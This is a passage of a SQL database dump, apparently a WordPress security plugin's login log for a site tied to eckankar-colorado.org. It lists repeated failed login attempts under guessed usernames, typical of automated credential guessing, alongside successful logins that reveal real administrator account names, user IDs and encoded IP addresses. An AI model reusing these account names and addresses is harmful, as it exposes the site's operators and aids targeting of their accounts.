AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(18312,108525,1691241090.888819,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB90609AA,'Mozilla/5.0 (Linux; Android 12; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18313,108526,1691241094.706823,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF91EF5CB9,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(18314,108527,1691241098.656467,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF2BF9E2BA,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/15.0 Chrome/90.0.4430.210 Mobile Safari/537.36'),(18315,108528,1691241101.344313,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFFCA3DA6E7,'Mozilla/5.0 (Linux; Android 12; Pixel 4 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18316,108529,1691241103.396881,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF679E283B,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15'),(18317,108530,1691241106.414123,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFC5F8D5A2,'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'),(18333,109041,1691303682.205458,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFA7632752,'Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N960U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18334,109042,1691303683.527267,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF550D566F,'Mozilla/5.0 (Linux; Android 10; CPH1921) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18335,109043,1691303686.854675,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF92C47861,'Mozilla/5.0 (Linux; Android 11; SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18336,109044,1691303688.960913,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFBA618F62,'Mozilla/5.0 (Linux; Android 11; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18337,109045,1691304470.464581,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF411488AE,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.84 Mobile/15E148 Safari/604.1'),(19295,119130,1694895682.771690,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19296,119131,1694895683.405830,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19297,119132,1694895683.598611,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19298,119133,1694895683.793359,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19299,119134,1694895683.983432,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19300,119135,1694895684.172362,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19301,119136,1694895684.362861,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19302,119137,1694895684.549383,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19269,118730,1694684455.159175,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFDF605D55,'Mozilla/5.0 (Linux; Android 11; SM-A716V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19270,118731,1694684457.109117,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF5762B781,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19271,118732,1694684458.382305,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (Linux; Android 11; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19272,118733,1694684459.677222,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF6BAA4315,'Mozilla/5.0 (Linux; Android 11; SM-A426U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19273,118734,1694684462.354767,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF77942042,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.84 Mobile/15E148 Safari/604.1'),(19227,117912,1694310675.663730,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB07A7938,'Mozilla/5.0 (Android 11; Mobile; rv:96.0) Gecko/96.0 Firefox/96.0'),(19230,117915,1694310682.607842,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF67295A0A,'Mozilla/5.0 (Linux; Android 12; Pixel 5a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36 EdgA/96.0.1054.62'),(19228,117913,1694310677.769793,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFDEFE07B5,'Mozilla/5.0 (Linux; Android 10; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19229,117914,1694310680.396261,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF6726B6C2,'Mozilla/5.0 (Linux; Android 12; SM-G991U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19231,117920,1694317020.583434,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D775910,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/189.0.413529291 Mobile/15E148 Safari/604.1'),(19232,117921,1694317023.180115,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF2BE07463,'Mozilla/5.0 (Linux; Android 11; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19233,117922,1694317025.198277,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF26644C08,'Mozilla/5.0 (Linux; Android 10; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19150,117197,1693891371.197136,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF6E2C7706,'Mozilla/5.0 (Linux; Android 11; M2007J20CG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19151,117198,1693891373.403789,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFD942CF03,'Mozilla/5.0 (Linux; Android 12; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19152,117199,1693891376.208263,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF67A0CE06,'Mozilla/5.0 (Linux; Android 11; moto g power (2022)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19153,117200,1693891378.597929,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF3EB6C8BC,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.87 Mobile DuckDuckGo/5 Safari/537.36'),(19154,117205,1693907830.234850,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF17814088,'Mozilla/5.0 (Linux; Android 12; SM-G991U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19123,116765,1693765785.958110,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19124,116767,1693766568.795960,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1080B0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(19125,116770,1693768430.111632,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19126,116969,1693796347.343648,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19127,116970,1693797335.095928,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19128,116985,1693810080.270793,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF71840AAB,'Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19129,116986,1693810083.189425,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF2D40B22B,'Mozilla/5.0 (Linux; Android 11; SM-T867V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(19130,116987,1693810086.219624,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF75DCC605,'Mozilla/5.0 (Linux; Android 11; EA211001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19131,116989,1693810108.875870,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF67BA66F0,'Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19132,116990,1693810111.294481,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFABEBB466,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/97.0.1072.56 Version/15.0 Mobile/15E148 Safari/604.1'),(19133,116991,1693810112.815883,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFC7C3F8D1,'Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19114,116728,1693731767.428694,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF72F2441C,'Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19115,116729,1693731769.932001,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF67103F96,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19057,116480,1693508006.154082,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19058,116481,1693508043.317720,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19059,116491,1693508964.278402,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19060,116497,1693538664.229289,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19061,116498,1693538664.983071,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19062,116499,1693538665.198544,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19063,116500,1693538665.406132,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19064,116501,1693538665.610599,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19065,116502,1693538665.820874,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19066,116503,1693538666.024800,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19067,116504,1693538666.228162,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19068,116505,1693538666.434028,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19069,116506,1693538666.640843,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19070,116507,1693538666.845421,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19071,116508,1693538667.047756,1,'loginFailInvalidUsername','adminhotel',0,0x00000000000000000000FFFF14F24104,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19072,116510,1693539784.196231,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E5D31,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18926,114077,1692989147.128769,1,'loginFailInvalidUsername','wpadmins',0,0x00000000000000000000FFFF58C60632,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0'),(18953,114206,1693146933.803356,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860AA19,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18925,113990,1692920790.406973,1,'loginFailInvalidUsername','design_admin',0,0x00000000000000000000FFFF140A9C3F,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18927,114081,1693002927.611426,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2B8EF456,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18928,114082,1693002931.341481,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF652BE763,'Mozilla/5.0 (Linux; Android 10; moto z4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36'),(18862,113048,1692726719.751410,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFC99477A6,'Mozilla/5.0 (iPad; CPU OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(18863,113049,1692726725.492737,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB5D1718A,'Mozilla/5.0 (Linux; Android 12; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18864,113051,1692726729.930234,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF557AB4EB,'Mozilla/5.0 (Linux; Android 11; SM-N975U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18865,113052,1692726731.420489,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5B868ED3,'Mozilla/5.0 (Linux; Android 10; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18866,113057,1692733695.990586,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF5E9A11A0,'Mozilla/5.0 (Linux; Android 11; KB2007 Build/RP1A.201005.001; ) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.101 Mobile Safari/537.36 BingSapphire/22.0.400111302'),(18867,113058,1692733698.610914,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF3CBA77FC,'Mozilla/5.0 (iPad; CPU OS 12_5_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),(18868,113059,1692733701.531521,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFCAB278AF,'Mozilla/5.0 (Linux; Android 10; SM-N960U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18869,113060,1692733704.506049,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFBE07E7FA,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(18870,113061,1692733707.050878,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF2BE6C3CA,'Mozilla/5.0 (Linux; Android 8.1.0; LML212VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36'),(18871,113062,1692733716.139493,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF2D775A88,'Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18872,113063,1692733721.882974,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFBB1031E6,'Mozilla/5.0 (Linux; Android 11; moto g power (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18873,113081,1692744456.818157,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF208DD6DA,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18874,113082,1692744458.909520,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBFF34B20,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36'),(18875,113083,1692744461.881829,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF1781408B,'Mozilla/5.0 (Linux; Android 11; SM-T727V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(18876,113084,1692744464.801501,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF675E1812,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18877,113085,1692744467.326452,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF5F6BAD59,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(18878,113086,1692744469.807330,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFB9DDFD78,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62'),(18879,113087,1692744472.267863,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF3A5741B4,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(18842,112998,1692657635.561120,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFCA3E3035,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18843,112999,1692657643.358109,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFC8A4953A,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/187.0.410885375 Mobile/15E148 Safari/604.1'),(18844,113000,1692657645.683443,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF82C1833A,'Mozilla/5.0 (Linux; Android 11; SM-S102DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18845,113001,1692657660.786220,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF6786A5F2,'Mozilla/5.0 (Windows NT 6.1; rv:96.0) Gecko/20100101 Firefox/96.0'),(18846,113002,1692657662.366993,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18847,113003,1692657664.988884,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF73545BB7,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18848,113004,1692660624.203910,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6732D71E,'Mozilla/5.0 (Linux; Android 12; SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18849,113005,1692660626.792174,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFC59B459A,'Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36'),(18850,113006,1692660630.101879,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB2990BA7,'Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36'),(18851,113007,1692660633.178489,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFDA3F91D8,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18852,113008,1692660635.300102,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFB286DEFA,'Mozilla/5.0 (Linux; Android 11; TMRVL4G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18853,113009,1692660636.684585,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF4D304A5B,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36'),(18828,112911,1692579415.281339,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF83C4B296,'Mozilla/5.0 (Linux; Android 10; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18854,113010,1692660639.477994,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB495EA6C,'Mozilla/5.0 (Linux; Android 11; Nokia G50) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18829,112912,1692579420.238972,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFD3A15A63,'Mozilla/5.0 (Linux; Android 12; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18830,112913,1692579425.125973,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF3DF7B3B6,'Mozilla/5.0 (Linux; Android 11; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18831,112914,1692579428.393332,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFD2380726,'Mozilla/5.0 (Linux; Android 11; SM-T500) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(18832,112915,1692579432.349448,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF175ED09A,'Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18833,112916,1692579434.701836,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF681CD92F,'Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18834,112917,1692579437.109946,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFD58337E2,'Mozilla/5.0 (Linux; Android 9; LGL455DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18835,112919,1692579925.244635,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF5C578E6F,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18836,112920,1692579926.896179,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF46205217,'Mozilla/5.0 (Linux; Android 12; SM-T870) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 